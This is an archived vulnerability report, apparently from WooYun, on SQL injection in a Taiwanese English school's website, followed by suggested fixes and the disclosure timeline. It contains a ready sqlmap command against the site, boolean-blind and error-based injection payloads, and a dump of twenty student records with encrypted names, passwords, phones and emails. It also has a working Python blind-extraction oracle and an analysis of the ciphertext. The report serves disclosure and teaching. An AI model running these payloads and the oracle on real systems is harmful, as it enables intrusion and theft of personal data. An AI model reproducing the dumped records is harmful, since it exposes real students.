Source: WooYun (WooYun.org) vulnerability archive mirror, http://wy.zone.ci/ (WooYun Drops articles: http://drop.zone.ci/)
Disclosure timeline:
2015-12-01: Details sent to the vendor, awaiting vendor response
2015-12-02: Vendor confirmed the issue; details visible to the vendor only
2015-12-12: Details opened to core white hats and relevant domain experts
2015-12-22: Details opened to regular white hats
2016-01-01: Details opened to intern white hats
2016-01-16: Details opened to the public
SQL injection on the 唐威廉美語 main site (mass leak of user passwords and personal data)
Vulnerable URL: http://**.**.**.**/more.php?TYPE=news&PAGE=7

The TYPE parameter is injectable. sqlmap, restricted to the boolean-based blind and error-based techniques, enumerated the database and dumped the first 20 of the 247 rows of stud_file (student records):

$ python sqlmap.py -u "http://**.**.**.**/more.php?TYPE=news&PAGE=7" -p TYPE --technique=BE --random-agent --batch -D williamschool_www -T stud_file -C stud_Cname,stud_Pass,stud_Tele,stud_Emai,stud_Fnam --dump --start 1 --stop 20
Database: williamschool_www
Table: stud_file
[20 entries]
+--------------------------+--------------------------+--------------------------+----------------------------------------------+----------------------+
| stud_Cname               | stud_Pass                | stud_Tele                | stud_Emai                                    | stud_Fnam            |
+--------------------------+--------------------------+--------------------------+----------------------------------------------+----------------------+
| 9djS9bBEc01z1q9zIS7E+g== | SZc6xzxNzgI=             | 67K+AVNu3WzCMPjIVLHQ2w== | /7OfI++7UkPonJftn7NgIdyux/65QuB9             | 唐威廉美語三峽北大校 |
| 7JB4eQyL87leVTIBQ0vlKQ== | dZ9lQTmZ+LS6hdR8DMPlyQ== | 9TNB7Tr+H8k/CR/NgmRIpA== | /FJEqAXHtkqB3ESa4bYPHCsgsh9xQFEM             | 唐威廉美語新莊光華校 |
| UZcx4hibRd08TQxzT9JF9w== | Tzb86Nd7SrtSqybg1lvsNw== | 19ybV86qISatJ6dYAKQFxQ== | /fJlpgqVocGNTpcIZzwoAeAzPWl+eRa6             | 唐威廉美語三峽北大校 |
| V3m2Agv1fUeiGe37rXcfIw== | 5l1bpgMDvjU=             | awni0P5GRq5IG8SnsFoMHw== | /Vn8L/asN6ozB4cPtEDxI4zHRI8ghnUqvyQfc01z9L8= | 唐威廉美語新莊光華校 |
| vzGDyl0jhMT9LJfeUd0qVA== | KFTOcEE1X7i/JB9zTXP0vw== | pttaTbLZIZk/CjZRa4/hMg== | +4KOktSoAZDfGRIvIOXyOZHIqEE6R/qQ             | 唐威廉美語三峽北大校 |
| XsvzsrtfuZL+lCZC3Vm/iA== | S3AJ2/8ljzZFhS9TBPsLfQ== | asAGDo9MaDB2bX8Lp9NRqA== | +h6Uqm9VfD+B3ESa4bYPHCsgsh9xQFEM             | 唐威廉美語板橋莒光校 |
| Ye7K3rziIOH9arkaeHUh8g== | 7LNfZp3oT5aZhZlV8LMcLw== | DoInEUb7kp11r8soOMbXtw== | +mBBydR4OPA1NsYUhoh5Iph4a+E7cfnM             | 唐威廉美語新莊光華校 |
| B3YzC7eUOqrJb4upTsBDxg== | DGMwobfelvQZBMqq6UFGjQ== | 4tOTyZH1duhlZ5sFrRPalQ== | +t0MXqMznJIPe+phYpsme0Z4QXaS/khqvyQfc01z9L8= | 唐威廉美語竹南校 |
| c0TjfZngjHEWB5TVj+ZH6A== | jcvV8cTgn5JAO2Ouhq2whw== | uE6SeyPRqlwLA0L77c5Qbg== | 01AZDhnTUDBb5s4O6eoV5r1iK4E7xanu             | 唐威廉美語新莊光華校 |
| c0TjfZngjHEWB5TVj+ZH6A== | Kz/+c3x4RM4=             | uE6SeyPRqlwLA0L77c5Qbg== | 01AZDhnTUDBmVwicoP9tRn2BFoPp1s4G             | 唐威廉美語新莊光華校 |
| vyQfc01z9L8=             | vyQfc01z9L8=             | vyQfc01z9L8=             | 022lf7XpE3F3k0C2dosVIa0QC3WZPv7EvyQfc01z9L8= | <blank> |
| PELBJvXZorTPMJ+R3HWYNA== | LqdeDiOvA0E=             | ns1Yf1fKF6Sv3CdF6KoGrw== | 0CAG8emWlMos6uiFWuRvbdyux/65QuB9             | 唐威廉美語新莊光華校 |
| c9EVrcaPuCBtKkfkYle6hg== | sulx1LFa1Ow=             | q1OZ8m4qZgqC7DR9WUDlbA== | 0cpqhjyu1UDFUQQvvUciv9yux/65QuB9             | 唐威廉美語彰化校 |
| xULdD/95fGvtD0M2u5IB0w== | 07D267z3yWO/JB9zTXP0vw== | 1tMnTV9r1Pry5qOwsHBuLQ== | 0tzRVagPmTPfGARcs0ZKK6vbI8BsaEVQ             | 唐威廉美語三峽北大校 |
| rbuJZT1o+Yv/0w9usFBfiw== | nLNGCfCcbmEeqpUbus/11A== | igLnWOCXT8CKHX/5XAKr9g== | 150H4b91GmIbMrzvAxyf1F4LOxreGD1+             | 唐威廉美語三峽北大校 |
| j+nc8QtutXRtKkfkYle6hg== | 9oMjnTutwzi+W1DjDcZilw== | XQBJL1Q8neFAO2Ouhq2whw== | 1h7LEAU/YyQ72EGTXOctjqvbI8BsaEVQ             | 唐威廉美語三峽北大校 |
| XyUzvNSgOH65X1C5C7yagg== | s4PSI7k55GC/JB9zTXP0vw== | Hrb0aJhwqH5X3pCmXAlTBA== | 1x1kAIphBZ5kkAtlYdhAIavbI8BsaEVQ             | 唐威廉美語彰化校 |
| MXMAtHwRpwg8TQxzT9JF9w== | VqYwIdqUnCK/JB9zTXP0vw== | pvOh9gQ8NF7miXWaLBpspg== | 23j7NYdb1RbBzLli2H+I8dvDYNg0vVGw             | 唐威廉美語板橋莒光校 |
| Mey0rEZTmyY=             | TZW8t1zrcVm/JB9zTXP0vw== | 5NJwNPTuz7RNHunRZ9YimA== | 2FOb9q7gjvdA0wqAFjo+gqvbI8BsaEVQ             | 唐威廉美語三峽北大校 |
| yu0cTdAbEc8CfDTNTR67Ow== | YDKzUXsl8NaSsYjerHOZeA== | 2EKNHSJWqHDG3KUYVG1b8Q== | 2l3OxkWC3LvmT6yAwOBrq9yux/65QuB9             | 唐威廉美語三峽北大校 |
+--------------------------+--------------------------+--------------------------+----------------------------------------------+----------------------+
---
Parameter: TYPE (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: TYPE=-2339' OR 5779=5779#&PAGE=7

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: TYPE=-6744' OR 1 GROUP BY CONCAT(0x71707a7871,(SELECT (CASE WHEN (1419=1419) THEN 1 ELSE 0 END)),0x71766b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&PAGE=7
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL >= 5.0.0
current user: 'www@%'
current user is DBA: False
database management system users [1]:
[*] 'www'@'%'

The boolean-based payload only tells whether the page still renders an item (the injected OR is true) or not, so data has to be recovered one comparison at a time. The error-based payload is the classic MySQL duplicate-key trick: grouping on a CONCAT of the marker bytes (0x71707a7871 = 'qpzxq', 0x71766b6271 = 'qvkbq'), the probed expression and FLOOR(RAND(0)*2) makes MySQL raise a "Duplicate entry" error whose message contains the probed value, which is why sqlmap could pull whole rows from the error text. Note that the database user is not a DBA, so the impact stays at reading and writing the application schema.

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1016    |
| SESSION_VARIABLES                     | 329     |
| GLOBAL_VARIABLES                      | 317     |
| GLOBAL_STATUS                         | 312     |
| SESSION_STATUS                        | 312     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197     |
| COLLATIONS                            | 197     |
| STATISTICS                            | 112     |
| PARTITIONS                            | 109     |
| TABLES                                | 109     |
| KEY_COLUMN_USAGE                      | 74      |
| TABLE_CONSTRAINTS                     | 71      |
| CHARACTER_SETS                        | 39      |
| PLUGINS                               | 23      |
| SCHEMA_PRIVILEGES                     | 18      |
| ENGINES                               | 9       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+

Database: williamschool_www
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| page_tags                             | 18370   |
| card_file                             | 5576    |
| photo_pictures                        | 3914    |
| hwor_file                             | 2052    |
| mp3u_file                             | 1897    |
| page_rssnews2                         | 1749    |
| page_news                             | 1609    |
| page_rssnews                          | 1306    |
| logi_file                             | 1134    |
| fb_1000                               | 1099    |
| page_freeco                           | 651     |
| fb_tests                              | 506     |
| page_alliance                         | 267     |
| stud_file                             | 247     |
| page_sms                              | 228     |
| photo_config                          | 204     |
| page_dynco                            | 190     |
| page_sms_back                         | 180     |
| photo_filetypes                       | 105     |
| photo_albums                          | 77      |
| page_keyword                          | 74      |
| page_keyword_0908                     | 74      |
| photo_languages                       | 67      |
| fb_user                               | 56      |
| page_links                            | 30      |
| photo_categories                      | 28      |
| page_homco                            | 27      |
| teac_file                             | 21      |
| page_fran                             | 20      |
| page_fran2                            | 19      |
| photo_comments                        | 17      |
| coun_file                             | 10      |
| page_topalli                          | 10      |
| page_topeven                          | 10      |
| page_topnews                          | 10      |
| photo_usergroups                      | 9       |
| photo_bridge                          | 7       |
| bbs_file                              | 5       |
| page_dynme                            | 5       |
| page_freeme                           | 5       |
| page_mail                             | 5       |
| page_rss                              | 5       |
| page_rss2                             | 5       |
| page_user                             | 5       |
| opti_file                             | 3       |
| page_file                             | 3       |
| page_homme                            | 3       |
| photo_users                           | 2       |
| photo_votes                           | 2       |
| comp_config                           | 1       |
| page_config                           | 1       |
| page_frane                            | 1       |
| page_star                             | 1       |
| page_star_bak                         | 1       |
| photo_mod_online                      | 1       |
+---------------------------------------+---------+

columns LIKE 'pass' were found in the following databases:

Database: williamschool_www
Table: photo_albums
[2 columns]
+-------------------+-------------+
| Column            | Type        |
+-------------------+-------------+
| alb_password      | varchar(32) |
| alb_password_hint | text        |
+-------------------+-------------+

Database: williamschool_www
Table: page_user
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| user_pass | varchar(20) |
+-----------+-------------+

Database: williamschool_www
Table: stud_file
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| stud_Pass | varchar(30) |
+-----------+-------------+

Database: williamschool_www
Table: teac_file
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| teac_Pass | varchar(20) |
+-----------+-------------+

Database: williamschool_www
Table: photo_users
[1 column]
+---------------+-------------+
| Column        | Type        |
+---------------+-------------+
| user_password | varchar(40) |
+---------------+-------------+

Database: williamschool_www
Table: page_fran
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| fran_Pass | varchar(50) |
+-----------+-------------+
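The boolean-based blind oracle sqlmap reported for TYPE, reproduced against an in-memory SQLite stand-in so it runs offline, next to the parameterized query that closes the hole. This is an added example, not code from the report or from the affected site: the table and column names are borrowed from the dump, but the schema, the rows, the secret being recovered and the more_php_* handlers are constructed. The live target ran PHP 5.3.29 on MySQL, so sqlmap commented out the query tail with '#'; SQLite has no '#' comment, so '-- ' is used here, and the rest of the payload shape (-1' OR (...)) is the same.

```python
"""Boolean-based blind SQL injection, as sqlmap used it on more.php?TYPE=...,
against a constructed SQLite stand-in, plus the bound-parameter fix."""
import sqlite3

# Constructed stand-in schema: only what the demo needs (not the real site's schema).
SCHEMA = """
CREATE TABLE page_news (id INTEGER PRIMARY KEY, type TEXT, body TEXT);
CREATE TABLE stud_file (stud_SN INTEGER PRIMARY KEY, stud_Cname TEXT, stud_Pass TEXT);
INSERT INTO page_news (type, body) VALUES ('news', 'item 1'), ('news', 'item 2');
INSERT INTO stud_file VALUES (1, 'student-a', 'Sp4rkle!'), (2, 'student-b', 'hunter2');
"""


def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def more_php_vulnerable(con, type_param, page=1):
    """The bug class on the target: TYPE is concatenated straight into the WHERE clause."""
    sql = ("SELECT body FROM page_news WHERE type = '%s' LIMIT 1 OFFSET %d"
           % (type_param, page - 1))
    return con.execute(sql).fetchall()


def more_php_fixed(con, type_param, page=1):
    """Same query with bound parameters: the payload is compared as a plain string."""
    sql = "SELECT body FROM page_news WHERE type = ? LIMIT 1 OFFSET ?"
    return con.execute(sql, (type_param, page - 1)).fetchall()


class BlindOracle:
    """Yes/no oracle: does the page still render an item for this TYPE value?"""

    def __init__(self, con):
        self.con, self.requests = con, 0

    def ask(self, condition):
        self.requests += 1
        # Same shape as sqlmap's "-2339' OR 5779=5779#", with SQLite's comment token.
        payload = "-1' OR (%s)-- " % condition
        return bool(more_php_vulnerable(self.con, payload))

    def extract(self, subquery, max_len=64):
        """Recover the string returned by `subquery`: bisect its length, then
        bisect every character. Assumes printable ASCII (sqlmap uses a wider range)."""
        lo, hi = 0, max_len
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask("length((%s)) > %d" % (subquery, mid)):
                lo = mid + 1
            else:
                hi = mid
        length, out = lo, []
        for i in range(1, length + 1):
            lo, hi = 32, 126
            while lo < hi:
                mid = (lo + hi) // 2
                if self.ask("unicode(substr((%s), %d, 1)) > %d" % (subquery, i, mid)):
                    lo = mid + 1
                else:
                    hi = mid
            out.append(chr(lo))
        return "".join(out)


def demo():
    """Recover one password blind, then show the same payload failing against the fixed handler."""
    con = build_db()
    oracle = BlindOracle(con)
    secret = oracle.extract("SELECT stud_Pass FROM stud_file WHERE stud_SN = 1")
    blocked = more_php_fixed(con, "-2339' OR 5779=5779-- ")
    return secret, oracle.requests, blocked


if __name__ == "__main__":
    secret, n, blocked = demo()
    print("recovered %r in %d requests; parameterized handler returned %r"
          % (secret, n, blocked))
```

Each recovered character costs about seven requests, which is why sqlmap prefers the error-based channel when the server echoes MySQL errors, and why even a site that hides errors is still fully readable through the boolean oracle.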
Database: williamschool_www
Table: stud_file
[23 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| stud_Addr  | varchar(120) |
| stud_Auth  | varchar(10)  |
| stud_Birth | varchar(24)  |
| stud_Cdate | date         |
| stud_Cname | varchar(35)  |
| stud_Cuse  | varchar(25)  |
| stud_Edate | date         |
| stud_Emai  | varchar(100) |
| stud_Enam  | varchar(25)  |
| stud_Fnam  | varchar(30)  |
| stud_Fran  | int(3)       |
| stud_Leve  | int(2)       |
| stud_Mdate | date         |
| stud_Muse  | varchar(25)  |
| stud_Pass  | varchar(30)  |
| stud_Pem1  | varchar(100) |
| stud_Pem2  | varchar(100) |
| stud_Phon  | varchar(40)  |
| stud_Pnam  | varchar(25)  |
| stud_Prea  | varchar(15)  |
| stud_SN    | int(11)      |
| stud_Stau  | varchar(1)   |
| stud_Tele  | varchar(40)  |
+------------+--------------+
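The dumped cells are base64 blobs whose decoded lengths are 8, 16, 24 or 32 bytes, identical cells recur across rows (the two rows for the same student carry byte-for-byte equal stud_Cname and stud_Tele), every blank field encodes to the same value vyQfc01z9L8=, and that same 8-byte value also closes several stud_Emai ciphertexts. The helpers below, an added example and not part of the report, make those observations checkable on the rows copied from the dump above. The conclusion they point at, a 64-bit block cipher applied deterministically with no IV (ECB-style), is an inference from ciphertext shape; the report does not name the cipher or the mode, and the functions only count blocks.

```python
"""Shape analysis of the stud_file ciphertexts dumped by sqlmap. Rows are copied
from the report; the interpretation (64-bit blocks, ECB-style) is an inference."""
import base64
import math
from collections import Counter
from functools import reduce

# (stud_Cname, stud_Pass, stud_Tele, stud_Emai) for ten of the dumped rows.
DUMP_ROWS = [
    ("9djS9bBEc01z1q9zIS7E+g==", "SZc6xzxNzgI=", "67K+AVNu3WzCMPjIVLHQ2w==", "/7OfI++7UkPonJftn7NgIdyux/65QuB9"),
    ("V3m2Agv1fUeiGe37rXcfIw==", "5l1bpgMDvjU=", "awni0P5GRq5IG8SnsFoMHw==", "/Vn8L/asN6ozB4cPtEDxI4zHRI8ghnUqvyQfc01z9L8="),
    ("vzGDyl0jhMT9LJfeUd0qVA==", "KFTOcEE1X7i/JB9zTXP0vw==", "pttaTbLZIZk/CjZRa4/hMg==", "+4KOktSoAZDfGRIvIOXyOZHIqEE6R/qQ"),
    ("B3YzC7eUOqrJb4upTsBDxg==", "DGMwobfelvQZBMqq6UFGjQ==", "4tOTyZH1duhlZ5sFrRPalQ==", "+t0MXqMznJIPe+phYpsme0Z4QXaS/khqvyQfc01z9L8="),
    ("c0TjfZngjHEWB5TVj+ZH6A==", "jcvV8cTgn5JAO2Ouhq2whw==", "uE6SeyPRqlwLA0L77c5Qbg==", "01AZDhnTUDBb5s4O6eoV5r1iK4E7xanu"),
    ("c0TjfZngjHEWB5TVj+ZH6A==", "Kz/+c3x4RM4=", "uE6SeyPRqlwLA0L77c5Qbg==", "01AZDhnTUDBmVwicoP9tRn2BFoPp1s4G"),
    ("vyQfc01z9L8=", "vyQfc01z9L8=", "vyQfc01z9L8=", "022lf7XpE3F3k0C2dosVIa0QC3WZPv7EvyQfc01z9L8="),
    ("PELBJvXZorTPMJ+R3HWYNA==", "LqdeDiOvA0E=", "ns1Yf1fKF6Sv3CdF6KoGrw==", "0CAG8emWlMos6uiFWuRvbdyux/65QuB9"),
    ("xULdD/95fGvtD0M2u5IB0w==", "07D267z3yWO/JB9zTXP0vw==", "1tMnTV9r1Pry5qOwsHBuLQ==", "0tzRVagPmTPfGARcs0ZKK6vbI8BsaEVQ"),
    ("yu0cTdAbEc8CfDTNTR67Ow==", "YDKzUXsl8NaSsYjerHOZeA==", "2EKNHSJWqHDG3KUYVG1b8Q==", "2l3OxkWC3LvmT6yAwOBrq9yux/65QuB9"),
]

# The value every blank field encrypts to. Under block-cipher padding an empty
# (or block-aligned) input ends in one whole block of padding, and without an IV
# that block encrypts to the same bytes every time (inference, see lead-in).
PAD_BLOCK = base64.b64decode("vyQfc01z9L8=")


def decode_all(rows):
    """Base64-decode every cell, keeping duplicates: the repeats are the signal."""
    return [base64.b64decode(cell) for row in rows for cell in row]


def infer_block_size(ciphertexts):
    """gcd of the ciphertext lengths. 8 means every value is a whole number of
    64-bit blocks (DES/3DES-sized); a hash would give one fixed length instead."""
    return reduce(math.gcd, (len(c) for c in ciphertexts))


def nth_block(b64, n, block_size=8):
    """The n-th (0-based) block of a base64-encoded ciphertext."""
    raw = base64.b64decode(b64)
    return raw[n * block_size:(n + 1) * block_size]


def repeated_blocks(ciphertexts, block_size):
    """Count each block value across all ciphertexts and keep the repeats.
    With a fresh IV per record this would be empty on a sample this small."""
    counts = Counter(c[i:i + block_size]
                     for c in ciphertexts for i in range(0, len(c), block_size))
    return Counter({blk: n for blk, n in counts.items() if n > 1})


def shared_prefix_blocks(a_b64, b_b64, block_size=8):
    """Number of leading blocks two ciphertexts share (same plaintext prefix, no IV)."""
    a, b = base64.b64decode(a_b64), base64.b64decode(b_b64)
    n = 0
    for i in range(0, min(len(a), len(b)), block_size):
        if a[i:i + block_size] != b[i:i + block_size]:
            break
        n += 1
    return n


def summarize(rows=DUMP_ROWS):
    cts = decode_all(rows)
    bs = infer_block_size(cts)
    rep = repeated_blocks(cts, bs)
    return {"block_size": bs, "values": len(cts),
            "repeated_block_values": len(rep), "pad_block_occurrences": rep[PAD_BLOCK]}


if __name__ == "__main__":
    print(summarize())
    # Same student twice: identical stud_Cname ciphertext, and the two stud_Emai
    # values share their first block (same e-mail prefix, same ciphertext).
    print(shared_prefix_blocks(DUMP_ROWS[4][0], DUMP_ROWS[5][0]),
          shared_prefix_blocks(DUMP_ROWS[4][3], DUMP_ROWS[5][3]))
```

Because the values are variable length they cannot be hashes; they are reversible, so whoever also reads the key (which the PHP code must hold to log students in) recovers every password, and even without the key the equal-block structure leaks which records share names, phone numbers or e-mail domains.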
Suggested fix: put the site behind a WAF. A WAF only filters known payload shapes, so the real fix is in more.php: stop building the query by string concatenation and pass TYPE and PAGE as bound parameters (mysqli or PDO prepared statements), and reject any TYPE value that is not one of the section names the page is meant to show. The stud_Pass values are also variable-length blobs rather than fixed-length hashes, so they are reversibly encrypted; replace them with a salted, slow password hash (bcrypt or Argon2) so a future dump does not hand out working passwords.
Severity: High
Vulnerability rank: 16
Confirmed: 2015-12-02 15:09
Thanks for the report.
2016-01-12: After receiving the report, HITCON emailed the service address listed on the website and also telephoned the site's contact person to notify them of this vulnerability, but there has been no response to date.